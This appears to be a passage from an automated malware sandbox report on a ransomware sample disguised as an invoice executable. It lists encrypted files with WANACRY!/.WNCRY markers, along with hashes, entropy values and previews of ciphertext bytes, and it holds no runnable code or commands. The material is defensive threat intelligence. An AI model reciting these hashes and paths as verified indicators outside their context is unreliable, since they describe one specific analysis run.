                                                          Preview:WANACRY!.....hW.;....^...zw.T.........._......!BO..R(~....+Lv.@#y.v..f...........@..y<.F.F]O..Y..%..x.....9......W....Wir.......A..G*.Gz..;+.........n.!....1..XH...eR.m.?t.Y.J..9.fk...bfYI.....m..uH.&.....c.a..+seZf. c.....g<.M..%.......uc..39./".WU?..`..M. .....,......{..|)B..28@..-....]..J..=.\(....B.(...q.....N......e..^..&......:.B.....!.E..0D..M..XMbv}/..X.....g*R.......&>B.....t...vnqZ'.!.0x.....qO...`t...U..Sc..7BT...#r%.Kc...G........pF:.8 ..R,......YEBe.8..l8.....4|.L..S.^].t.;.^..j-E}0T.2...Z.y.__.X..1.+..../.........*+:......1.T_~<.._E.D..U.i.q......G.3esP.C.5..B)..}....8p|K]..=.-...E!)...v..I..}.......u.v^.....G...1...z8.A..b.~.D....v...f.tlw.%-.Q*.*.#g...W..QL.....2...].<R.<....J..-)+..]..8.Mo,n.AT.!d.ap?dd.o....R..p...z.L.1WMd.....N.S..,.3`..0V..m..d....cX.......,-.{.tV.........'$ m.i.8s..{.{*WK3....[<2)rH..0.rF+....r.O...........NG.cb.U?....W.+2.~DpN`&......=.W.y|4...F.. ../.0.^kT..h.B....k.....q{....$R,......V.3.Q.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\7TU8ICAJ\th[2].png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):19720
                                                          Entropy (8bit):7.991413595592335
                                                          Encrypted:true
                                                          SSDEEP:384:kE5bm0q3QDHIh/YeSlelzs8EBP3LoUodTKe4hjzF9kZrMnfpr6JSxjdotPf5:dsADTjlelzsBzoUodTehjzF9kZgfFsSo
                                                          MD5:E0EE4119B123CBE375C957060261584B
                                                          SHA1:842D02089E7B69B6C005924381F4080C34F2F066
                                                          SHA-256:B238803D53EAB5CEECBA697D9E814AE59F96ECA63A1DD32BD3BDE9530146341D
                                                          SHA-512:ADC75AF580D0031262070DBB9BFEFE7589BC6FFB45B9369388EF23C9466ADB92CE53498ED3BE19DC851E7258A5FC03DA9D67C5109DC658546034C358A97A4A20
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......;t..........{.g.s....].....V.....wO...I..e.4m...eL..`sP.:.".m.s..N..g...fHE.A....t...7..A...<.h.G...5..o...A9W..D.L.ui..!.I<t.;.Me..W.m......|..[.].O....6/:Hw...;...M$#.1..dl.5.8..Ue.'..=..r..+.F%....O......w.....E..3...C..7.-.)...$....6......K.......4.Z_q.3.7t......c...,;...`.>.+{Ap....4.....t..f..<.....2^....-9.R1_+..z...+.z...1$.i..~.[.G.K....].)>......[S...g]o..i....`6{..G..p.N.h..%B.....7F...#,..I<..5.^..>0.66..U...D...... ....>..q....,.[.....F'U..4.wZ\#.I....c,.."/.,...\.2e..;g7..#.?......]I...#S.T...h/....[w..6......T...ms..%...~.7I@.XW7(...{..%.o.&..j...Y..Q..mc(.8...w.f...6tGR...l..:..HD.C.a.4./~...............<...].a..Q.A..>3.. .....*.t.p.Eg......y.X..K.....0..>X.^.Xz....ia(.&..7..2....ZZx..)<@....[X....<...{6.N....o...L.!T.m...m .ov...]B....O0t.`.hS.(.5v.~V......F.;..W.......V. |.R.F..._.75R....'.'z.ct..|...|B...BK..Y'P..&..,~...^........%.zt.Bnn...qw.!..sM/3}./........d9.9..d..-..#....[...<#!!uGs....AH

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\7TU8ICAJ\th[2].png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):19720
                                                          Entropy (8bit):7.991413595592335
                                                          Encrypted:true
                                                          SSDEEP:384:kE5bm0q3QDHIh/YeSlelzs8EBP3LoUodTKe4hjzF9kZrMnfpr6JSxjdotPf5:dsADTjlelzsBzoUodTehjzF9kZgfFsSo
                                                          MD5:E0EE4119B123CBE375C957060261584B
                                                          SHA1:842D02089E7B69B6C005924381F4080C34F2F066
                                                          SHA-256:B238803D53EAB5CEECBA697D9E814AE59F96ECA63A1DD32BD3BDE9530146341D
                                                          SHA-512:ADC75AF580D0031262070DBB9BFEFE7589BC6FFB45B9369388EF23C9466ADB92CE53498ED3BE19DC851E7258A5FC03DA9D67C5109DC658546034C358A97A4A20
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......;t..........{.g.s....].....V.....wO...I..e.4m...eL..`sP.:.".m.s..N..g...fHE.A....t...7..A...<.h.G...5..o...A9W..D.L.ui..!.I<t.;.Me..W.m......|..[.].O....6/:Hw...;...M$#.1..dl.5.8..Ue.'..=..r..+.F%....O......w.....E..3...C..7.-.)...$....6......K.......4.Z_q.3.7t......c...,;...`.>.+{Ap....4.....t..f..<.....2^....-9.R1_+..z...+.z...1$.i..~.[.G.K....].)>......[S...g]o..i....`6{..G..p.N.h..%B.....7F...#,..I<..5.^..>0.66..U...D...... ....>..q....,.[.....F'U..4.wZ\#.I....c,.."/.,...\.2e..;g7..#.?......]I...#S.T...h/....[w..6......T...ms..%...~.7I@.XW7(...{..%.o.&..j...Y..Q..mc(.8...w.f...6tGR...l..:..HD.C.a.4./~...............<...].a..Q.A..>3.. .....*.t.p.Eg......y.X..K.....0..>X.^.Xz....ia(.&..7..2....ZZx..)<@....[X....<...{6.N....o...L.!T.m...m .ov...]B....O0t.`.hS.(.5v.~V......F.;..W.......V. |.R.F..._.75R....'.'z.ct..|...|B...BK..Y'P..&..,~...^........%.zt.Bnn...qw.!..sM/3}./........d9.9..d..-..#....[...<#!!uGs....AH

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\7TU8ICAJ\th[3].png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):25832
                                                          Entropy (8bit):7.993040086736139
                                                          Encrypted:true
                                                          SSDEEP:384:XAg2YNkfKkOhCyWLvX2VayMELrV4ZuR6Ugj0BBLJxOEQHZbz2PjUCCjvljJDb3nb:XRyKRhfWL+8QV42FZLJoPZbz45o5r
                                                          MD5:5C45D24F8A8AC6E0A0F9A9375A731D2B
                                                          SHA1:73442A74D6F972793BCFBADFF7881FDA5F2E40DD
                                                          SHA-256:CE9949CCA1FF9D19824EAE92BC17BE4E1BB5BAE08D79887339332318650BFEA1
                                                          SHA-512:65A39B4D488B980E8DCEDE08633F31D84F98C42AF42BA349A7DB69E02292FB53C7C9A039D402A0718C50D2B6A28472EFAEAFEF80E2279C112E9962FF98E93E37
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!........T.'...'r.\..h&.u.....V.!....)W.....r.;.;.p...{}.!._..<....p\.j.._......uN3.k..LT.x/.}.*5..!..T.b...I.&}Fs.....1Z8~.}..,..iJy]..k..x].V.....^....Iv..I....V..z].^.9OI..W...c\..W.s...m.x.P%Z.....o..9\,..x"<...6#...c.F..q.E...`......4..q........c...........}s.~P....$.y....|..h.m..~{.;...X..=......!;.@N8AD.>j*k?..5Ak.U2\.Z....uu.|O.i..N..OH.].'.^.......y......I.=...6t..M....M@O.F...9.....PK..L.../......D..O5.g.Qz.Z.3:P..4z..z2..P....`.+k..L.g.qc.~.7...'...r...9.n.KKj.S.......6U[D......M.r.5.^.(....qJ....R...9K7_...I.0..^.Y.kE.......1.Q./L.>...$.........m......_8....l-=....-....I.......A8....D.!...d.*........ro...w..O._......Rn....".i...+U/54..._..".I<...-y-....8.../...4.6...<.!...Ng..D..tt....P..0W.i..oy4|)...($.I&.:Z*.E..|.Q-."ZC.nO....+.>..f#>..h....t.d.h>..qt...".,...}J`.......w.o..c.K..|..j..U..ES......P../J.....rCq.........Lu5.....*.."D..S.W..S7k....xUV?.TJYW"shq7.......}-N..5'....[.Wh.ds......N4.V.@.`P.Mq.J.;>I

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\7TU8ICAJ\th[3].png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):25832
                                                          Entropy (8bit):7.993040086736139
                                                          Encrypted:true
                                                          SSDEEP:384:XAg2YNkfKkOhCyWLvX2VayMELrV4ZuR6Ugj0BBLJxOEQHZbz2PjUCCjvljJDb3nb:XRyKRhfWL+8QV42FZLJoPZbz45o5r
                                                          MD5:5C45D24F8A8AC6E0A0F9A9375A731D2B
                                                          SHA1:73442A74D6F972793BCFBADFF7881FDA5F2E40DD
                                                          SHA-256:CE9949CCA1FF9D19824EAE92BC17BE4E1BB5BAE08D79887339332318650BFEA1
                                                          SHA-512:65A39B4D488B980E8DCEDE08633F31D84F98C42AF42BA349A7DB69E02292FB53C7C9A039D402A0718C50D2B6A28472EFAEAFEF80E2279C112E9962FF98E93E37
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!........T.'...'r.\..h&.u.....V.!....)W.....r.;.;.p...{}.!._..<....p\.j.._......uN3.k..LT.x/.}.*5..!..T.b...I.&}Fs.....1Z8~.}..,..iJy]..k..x].V.....^....Iv..I....V..z].^.9OI..W...c\..W.s...m.x.P%Z.....o..9\,..x"<...6#...c.F..q.E...`......4..q........c...........}s.~P....$.y....|..h.m..~{.;...X..=......!;.@N8AD.>j*k?..5Ak.U2\.Z....uu.|O.i..N..OH.].'.^.......y......I.=...6t..M....M@O.F...9.....PK..L.../......D..O5.g.Qz.Z.3:P..4z..z2..P....`.+k..L.g.qc.~.7...'...r...9.n.KKj.S.......6U[D......M.r.5.^.(....qJ....R...9K7_...I.0..^.Y.kE.......1.Q./L.>...$.........m......_8....l-=....-....I.......A8....D.!...d.*........ro...w..O._......Rn....".i...+U/54..._..".I<...-y-....8.../...4.6...<.!...Ng..D..tt....P..0W.i..oy4|)...($.I&.:Z*.E..|.Q-."ZC.nO....+.>..f#>..h....t.d.h>..qt...".,...}J`.......w.o..c.K..|..j..U..ES......P../J.....rCq.........Lu5.....*.."D..S.W..S7k....xUV?.TJYW"shq7.......}-N..5'....[.Wh.ds......N4.V.@.`P.Mq.J.;>I

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\7TU8ICAJ\trans[1].gif.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.224423422076759
                                                          Encrypted:false
                                                          SSDEEP:6:bkEa4JeCI/OBzmPDn/3TrORz8qwQbS5k4c5apq4bRrqI89Rsgr:bkEaEeCI/OBuDn/3eRpzSK4nq4eXr
                                                          MD5:A3E8D9AC9E41BDBD691B68E11556182D
                                                          SHA1:FA45686B2E45B1ED3AA9CE886C3D69F354D5E7B5
                                                          SHA-256:05B544573046984BCAEE109968FA6177CB06C8BD3AA6C6F513B0E8C049E376D9
                                                          SHA-512:B77B0EF368CA30689B3B403BDBE618BEA14D9D053CAB478C223E50EF2D916036497208B4A1675D5A6D42552D0F29E81398E0A53AACBEABAAEE129B25E6540E31
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....}n&....G]-.],.....xR$..`..&....r.1.....!...a.D....f.}........Y.T...1.i.P...5+v.\..4d_n(W2}.Z...16.41..h.s..{N/.2<......GZ\..1E.....%......Q._..c.W.w&...C.6.j........s....`.K*e..^...'..k._.sX\....TR..1k^....o~..:......(..'.O...b....).](.B....+.......JQo.JjT.....$4Y./,..X.....E.%....@f.n.....?.9

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\7TU8ICAJ\trans[1].gif.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.224423422076759
                                                          Encrypted:false
                                                          SSDEEP:6:bkEa4JeCI/OBzmPDn/3TrORz8qwQbS5k4c5apq4bRrqI89Rsgr:bkEaEeCI/OBuDn/3eRpzSK4nq4eXr
                                                          MD5:A3E8D9AC9E41BDBD691B68E11556182D
                                                          SHA1:FA45686B2E45B1ED3AA9CE886C3D69F354D5E7B5
                                                          SHA-256:05B544573046984BCAEE109968FA6177CB06C8BD3AA6C6F513B0E8C049E376D9
                                                          SHA-512:B77B0EF368CA30689B3B403BDBE618BEA14D9D053CAB478C223E50EF2D916036497208B4A1675D5A6D42552D0F29E81398E0A53AACBEABAAEE129B25E6540E31
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....}n&....G]-.],.....xR$..`..&....r.1.....!...a.D....f.}........Y.T...1.i.P...5+v.\..4d_n(W2}.Z...16.41..h.s..{N/.2<......GZ\..1E.....%......Q._..c.W.w&...C.6.j........s....`.K*e..^...'..k._.sX\....TR..1k^....o~..:......(..'.O...b....).](.B....+.......JQo.JjT.....$4Y./,..X.....E.%....@f.n.....?.9

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\7TU8ICAJ\trans[2].gif.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.264826433214375
                                                          Encrypted:false
                                                          SSDEEP:6:bkE/vSBzBH7PxWsChSyIhkHpplOFAENO2Hbc46l0OFu0A2iIV+Cqs:bkE/qlVWsChSyRJplOF5No6OFuNfIR
                                                          MD5:D190E3DA88D505B9B9909264AA947F83
                                                          SHA1:A0230207B565E08A4E88258D2A9B0FD61118A31C
                                                          SHA-256:F6E3035C962B73295BED9AF5D36812F1524A69900E03B8D5F2B18056AC04CF69
                                                          SHA-512:B8E0A4535938CCE545BD389EE8ED798A585E333EF6C4B4E579A2D7AABC11302E823F4BAEF03AA2E51FB3563F81690AAD12C6A30458B411E7609390EC86945430
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....j.{."...wF>..|_...X..@J...FLj....{.6........I:.O.......d.w.."......$.W..v._.Z.hC=Q...............W.=.. ....etg_......WL..U9.FT.u.....X..3.F4'{.H6..`..iZ......V4....=.8m.a....<..AdF.J.....(.W..y.]~B.b....(.5j.F..x.....`.'....V..Vs..........]0C]....+........V.GS..d.S...*T.B......8..-.`.,t....o.S+JY.2.I

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\7TU8ICAJ\trans[2].gif.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.264826433214375
                                                          Encrypted:false
                                                          SSDEEP:6:bkE/vSBzBH7PxWsChSyIhkHpplOFAENO2Hbc46l0OFu0A2iIV+Cqs:bkE/qlVWsChSyRJplOF5No6OFuNfIR
                                                          MD5:D190E3DA88D505B9B9909264AA947F83
                                                          SHA1:A0230207B565E08A4E88258D2A9B0FD61118A31C
                                                          SHA-256:F6E3035C962B73295BED9AF5D36812F1524A69900E03B8D5F2B18056AC04CF69
                                                          SHA-512:B8E0A4535938CCE545BD389EE8ED798A585E333EF6C4B4E579A2D7AABC11302E823F4BAEF03AA2E51FB3563F81690AAD12C6A30458B411E7609390EC86945430
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....j.{."...wF>..|_...X..@J...FLj....{.6........I:.O.......d.w.."......$.W..v._.Z.hC=Q...............W.=.. ....etg_......WL..U9.FT.u.....X..3.F4'{.H6..`..iZ......V4....=.8m.a....<..AdF.J.....(.W..y.]~B.b....(.5j.F..x.....`.'....V..Vs..........]0C]....+........V.GS..d.S...*T.B......8..-.`.,t....o.S+JY.2.I

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\7TU8ICAJ\trans[3].gif.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.188362056807495
                                                          Encrypted:false
                                                          SSDEEP:6:bkEoiBPl4XZnFSAiDZ/rCQfTgbl15rjYrZguR+K89svYB8jJ8q2hNU2JjOmZ:bkEoiBPletFSAAZ/rCQrobFjYrZgZs8n
                                                          MD5:0D3CB8F33AA91A9C3619FDF90825DFF6
                                                          SHA1:BA4BE89C7D2A09B23FC33E58923D978D7A6C5062
                                                          SHA-256:77B480B665175C532D31E80D839F543E50A52D81AE9377FA6A2F0FED0C1984DD
                                                          SHA-512:F0AB3097C3991E1954AC92C557EA409209D5A6A30C549F876E42A4635716A5BB3111316A5CB7B874CDBB0DD0897052CCD53657EA7F6EC6F3F6980416A40C1319
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....mN........t.D.X..6u..G.&...j...&l.....W.-I..6y.q...@..w..T..i..q.C+...?..`Y.x..5,.Kzq..$....q6.j..d1...N......L.*;..rn83p..dy...D"...t.% ..D.....iD+N.C.x;f&:.I.R.....aU....6W.....X...........a...f7.f.....)(p.......r.h...{U.'.."...\wW@....U.D...)....+.........(..y~Xzu..6KN.s...H..?..6.EV.<".$...+[..;...N

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\7TU8ICAJ\trans[3].gif.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.188362056807495
                                                          Encrypted:false
                                                          SSDEEP:6:bkEoiBPl4XZnFSAiDZ/rCQfTgbl15rjYrZguR+K89svYB8jJ8q2hNU2JjOmZ:bkEoiBPletFSAAZ/rCQrobFjYrZgZs8n
                                                          MD5:0D3CB8F33AA91A9C3619FDF90825DFF6
                                                          SHA1:BA4BE89C7D2A09B23FC33E58923D978D7A6C5062
                                                          SHA-256:77B480B665175C532D31E80D839F543E50A52D81AE9377FA6A2F0FED0C1984DD
                                                          SHA-512:F0AB3097C3991E1954AC92C557EA409209D5A6A30C549F876E42A4635716A5BB3111316A5CB7B874CDBB0DD0897052CCD53657EA7F6EC6F3F6980416A40C1319
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....mN........t.D.X..6u..G.&...j...&l.....W.-I..6y.q...@..w..T..i..q.C+...?..`Y.x..5,.Kzq..$....q6.j..d1...N......L.*;..rn83p..dy...D"...t.% ..D.....iD+N.C.x;f&:.I.R.....aU....6W.....X...........a...f7.f.....)(p.......r.h...{U.'.."...\wW@....U.D...)....+.........(..y~Xzu..6KN.s...H..?..6.EV.<".$...+[..;...N

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\7TU8ICAJ\trans[4].gif.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.2734234425693565
                                                          Encrypted:false
                                                          SSDEEP:6:bkEk9gGpfL5oBePgG7F0viY4DbI4E5kuGR5G/O2fNitOUhuXNWpe/Wr:bkEk9gGN20B7OT4DU4MkuaSzIOUhFe/g
                                                          MD5:7F13D5DC7D89D375E5C2D99FDC6EB5FC
                                                          SHA1:65776A18810EE3AB895FD10630939531E0793563
                                                          SHA-256:760ECB3F3DD2527D995FF0A3A3CDCE6B7ADCDA30F018FE126C9B787497070383
                                                          SHA-512:E2F1E01D6463D1E61C01E225847991E078CAB3E420B86CEDCAEE7862B32599667E2E70CD994A2600D97A5684E3129FD72D20D969A7C1D8BCD7D4D02C9E367EB2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.........W;@....:.|!...W;.....lKdz..1..[B,.'.Sj..,bru.M..8*TH..c.nA..7x.D..S.5./...E.+r.......g.B.6.f..~....tn...W...Ss.r._..l.;..g<..P.5`^.V/..!3.oa.....Y.T...t#P......-...7...."....&..p..\l2..g...}.b.... ?..?........M&..M...Y3B$..../...q._F.....+.......#i...`0l7{...y....qr..qo.u..'...~....5.1.u.r.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\7TU8ICAJ\trans[4].gif.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.2734234425693565
                                                          Encrypted:false
                                                          SSDEEP:6:bkEk9gGpfL5oBePgG7F0viY4DbI4E5kuGR5G/O2fNitOUhuXNWpe/Wr:bkEk9gGN20B7OT4DU4MkuaSzIOUhFe/g
                                                          MD5:7F13D5DC7D89D375E5C2D99FDC6EB5FC
                                                          SHA1:65776A18810EE3AB895FD10630939531E0793563
                                                          SHA-256:760ECB3F3DD2527D995FF0A3A3CDCE6B7ADCDA30F018FE126C9B787497070383
                                                          SHA-512:E2F1E01D6463D1E61C01E225847991E078CAB3E420B86CEDCAEE7862B32599667E2E70CD994A2600D97A5684E3129FD72D20D969A7C1D8BCD7D4D02C9E367EB2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.........W;@....:.|!...W;.....lKdz..1..[B,.'.Sj..,bru.M..8*TH..c.nA..7x.D..S.5./...E.+r.......g.B.6.f..~....tn...W...Ss.r._..l.;..g<..P.5`^.V/..!3.oa.....Y.T...t#P......-...7...."....&..p..\l2..g...}.b.... ?..?........M&..M...Y3B$..../...q._F.....+.......#i...`0l7{...y....qr..qo.u..'...~....5.1.u.r.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\HPRDNLKN\th[1].png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):20120
                                                          Entropy (8bit):7.990697539679428
                                                          Encrypted:true
                                                          SSDEEP:384:hsca1HnNell1OcqcIBz4wrZaxAvAGFu3JJBNm2549c4uHMwRJKTxfXh:u1HwTfqBBz4wrNvCZJrmJc4OXKTRXh
                                                          MD5:95E718821BE3BC62A55F387EC8C56CFF
                                                          SHA1:3DF12708FED6597E70CC9AC1755A33EB088BA0CD
                                                          SHA-256:FAA9ED43789DA21F66343A8725F18972F8E93409F4543EE051CACDA8AAD2E1D5
                                                          SHA-512:52151721E2E9BCAE7BB073AB21F957A9366C70CEA712E8F89D04C9FBEEB2ECBD901EBD08CB0949441BE94481A748DE36DFE287956068181D63EF0050DC3E3163
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....S..v........i....>.p..fPv...p7_..y.#8;.E..B....Il...j..{.e.....O[.A..,..E...V!3.B..UC....1D......v..,%w.......eNq..L....Z..Wb..9......9Pv[.n7`.....$\7.....D.n\PW>.W).O..6.../<*..w0...l.N*..6(......<....c..jw.H".%.W.<....).w.J....p!..W.....R/8....rM.......|.!.F.X.C.V...9\`..H.^...e.*.-.M....n..A...4.w.......y.n...K......Z.P...1.{.&H..JB.'T...k.S.fo...A...*.w...M`...K..-.6b...7.o.a\...`..&........A'..1......Z...../m.Y.......G..T.........._.....`!...Y.......7p....)..n....mXs...Z7xw.x.O.gh.x.F...!.4....KR...e.......A...3.......2.d:.O....NY.s.%...)K....AI.b...M.../.}]....M%.r5.*.....2...D8..%.*..z...70..ER..l.uSf..E...R....t...xL..w...#...C..Gv........j..S.V........^........@...t........7....+c..8..hrJw>......\j.......+.+.}....AIr..y.5..(/4.....9..'.....(..cM......W..w..@....N.....H..5..%.o.l.....^...~#"....*.M..z.[.....s@E.Ss...m..s.....Z..(......D.....6.K.KS..q....q.XC.c..)QM....y.<}.l6..F...SOn.......%..&...g.....:(.H......

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\HPRDNLKN\th[1].png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):20120
                                                          Entropy (8bit):7.990697539679428
                                                          Encrypted:true
                                                          SSDEEP:384:hsca1HnNell1OcqcIBz4wrZaxAvAGFu3JJBNm2549c4uHMwRJKTxfXh:u1HwTfqBBz4wrNvCZJrmJc4OXKTRXh
                                                          MD5:95E718821BE3BC62A55F387EC8C56CFF
                                                          SHA1:3DF12708FED6597E70CC9AC1755A33EB088BA0CD
                                                          SHA-256:FAA9ED43789DA21F66343A8725F18972F8E93409F4543EE051CACDA8AAD2E1D5
                                                          SHA-512:52151721E2E9BCAE7BB073AB21F957A9366C70CEA712E8F89D04C9FBEEB2ECBD901EBD08CB0949441BE94481A748DE36DFE287956068181D63EF0050DC3E3163
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....S..v........i....>.p..fPv...p7_..y.#8;.E..B....Il...j..{.e.....O[.A..,..E...V!3.B..UC....1D......v..,%w.......eNq..L....Z..Wb..9......9Pv[.n7`.....$\7.....D.n\PW>.W).O..6.../<*..w0...l.N*..6(......<....c..jw.H".%.W.<....).w.J....p!..W.....R/8....rM.......|.!.F.X.C.V...9\`..H.^...e.*.-.M....n..A...4.w.......y.n...K......Z.P...1.{.&H..JB.'T...k.S.fo...A...*.w...M`...K..-.6b...7.o.a\...`..&........A'..1......Z...../m.Y.......G..T.........._.....`!...Y.......7p....)..n....mXs...Z7xw.x.O.gh.x.F...!.4....KR...e.......A...3.......2.d:.O....NY.s.%...)K....AI.b...M.../.}]....M%.r5.*.....2...D8..%.*..z...70..ER..l.uSf..E...R....t...xL..w...#...C..Gv........j..S.V........^........@...t........7....+c..8..hrJw>......\j.......+.+.}....AIr..y.5..(/4.....9..'.....(..cM......W..w..@....N.....H..5..%.o.l.....^...~#"....*.M..z.[.....s@E.Ss...m..s.....Z..(......D.....6.K.KS..q....q.XC.c..)QM....y.<}.l6..F...SOn.......%..&...g.....:(.H......

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\HPRDNLKN\th[1].svg.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):112328
                                                          Entropy (8bit):7.9984266644630875
                                                          Encrypted:true
                                                          SSDEEP:3072:LY1C/KjlHt9bGGKmUsThHqfmp2j3EJyjGyWhYVvkqO:LMt3bGG6yIfmpEoyjHWqVMqO
                                                          MD5:A09D4907451B742ED65ED7F56BFEA222
                                                          SHA1:A2B0106800A429810B95DACB28741876B8F026CB
                                                          SHA-256:306D032CBA47467B4625F8759B0F0E599ECCB1370EA84804B2677176A799828A
                                                          SHA-512:8B3A0EE9B415BC1E4291AB288A699599A9DE869A43DD9083CC6137EC7BCA9ECF043567A086D892E1ED1E5C1D8714DAC3C2707C2F0BE5E8CC6AB82BDF2DB1F4C3
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....*.:..[....+..._y....5[.....+.;q....N...../r...d.]$.}t...a.vO....9-.<?.1..2tJ...R.Ik...m...g.N..T.,......h.t.r...... ...4.d'.....r..lx1.G>....'...b*..9..BO$..M=+..,..MN..7...y!.x.3....~J..........$.F.2.tI_upL.>..<.R.P.....4.....9V..f.K.%.W).U.............B|J..-.< .~.Sq..%........z....A.Nm.tM.g4...d..'s...e{.(.ci=..@...N.E..........;......;..).....WH%...gR_eK{.L5......f1#".I4.V../....k1.3...x...<K...=..P.+...M.%$....q]8..)M.*..i.F.]AU..s..L...z...D...,fG.8g..O.....~..f.j..241..].s7:..=.....^tJ.a._...~v..n.LX"..6u%./.:..[....i|BU.L6*=E.(.......y2.pCx......RY!..=...{.PLO..KT3T.Sa....p..#E...6t..}kU....f.\.gQ.....n).....U..H..Q....p.r...e&.C..R......0......}........v..D.t...&...Z...B4r.-..2"..G.H=).2!.X#.x............|.7.....Q....z.++q..!=...p.1,M..J~... ...q......?Q...CX.L.S....<...rc......a(DL.e...I.../.G...RSl:........$..:e..d.]........)X.....R .i.o.\i`.....3yq|&t..3.~i.Y..=.U.......O-I...De..k.s.k.M..{Q..u...).K.._.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\HPRDNLKN\th[1].svg.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):112328
                                                          Entropy (8bit):7.9984266644630875
                                                          Encrypted:true
